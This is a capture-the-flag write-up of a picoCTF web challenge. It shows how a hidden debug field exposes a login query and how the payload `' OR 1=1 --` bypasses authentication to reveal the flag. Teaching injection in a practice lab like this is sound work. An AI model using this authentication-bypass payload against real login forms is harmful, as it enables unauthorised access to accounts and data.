Tags: sqli
Rating:
The hint here seems to point at an
[SQL injection](https://www.owasp.org/index.php/SQL_Injection), but let's
browse around the app. We have access to three views :
1. The index, that has nothing interesting
2. A "support" page
3. An "admin login page"
The support page contains another clue pointing at an SQL injection :
> Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep
> getting something called a SQL Error
With that in mind, we can look at the login page. Inspecting the source, we see
there's a hidden `debug` field :
```html
<form action="login.php" method="POST">
<fieldset>
<div class="form-group">
<label for="username">Username:</label>
<input type="text" id="username" name="username" class="form-control">
</div>
<div class="form-group">
<label for="password">Password:</label>
<div class="controls">
<input type="password" id="password" name="password" class="form-control">
</div>
</div>
<input type="hidden" name="debug" value="0">
<div class="form-actions">
<input type="submit" value="Login" class="btn btn-primary">
</div>
</fieldset>
</form>
```
To confirm that, I sent a request with a random username and no password (Note:
I used Burp suite's proxy and repeater to manipulate the requests). With
`debug=0`, we get :
```html
<h1>Login failed.</h1>
```
and with `debug=1` :
```html
username: iodbh<h1>Login failed.</h1>
password:
SQL query: SELECT * FROM users WHERE name='aaa' AND password=''
Great, no we know how to construct the SQL query.We can to return all rows
with a username or `' OR 1=1 --` and an empty password, which will end up
constructing the following request :
```sql
SELECT * FROM users WHERE name='' OR 1=1 --' AND password=''
```
Since anything after `--` is ignored, the effective query is :
```sql
SELECT * FROM users WHERE name='' OR 1=1
```
If we try this payload, we get the flag in the response :
`picoCTF{con4n_r3411y_1snt_1r1sh_9cbc118f}`
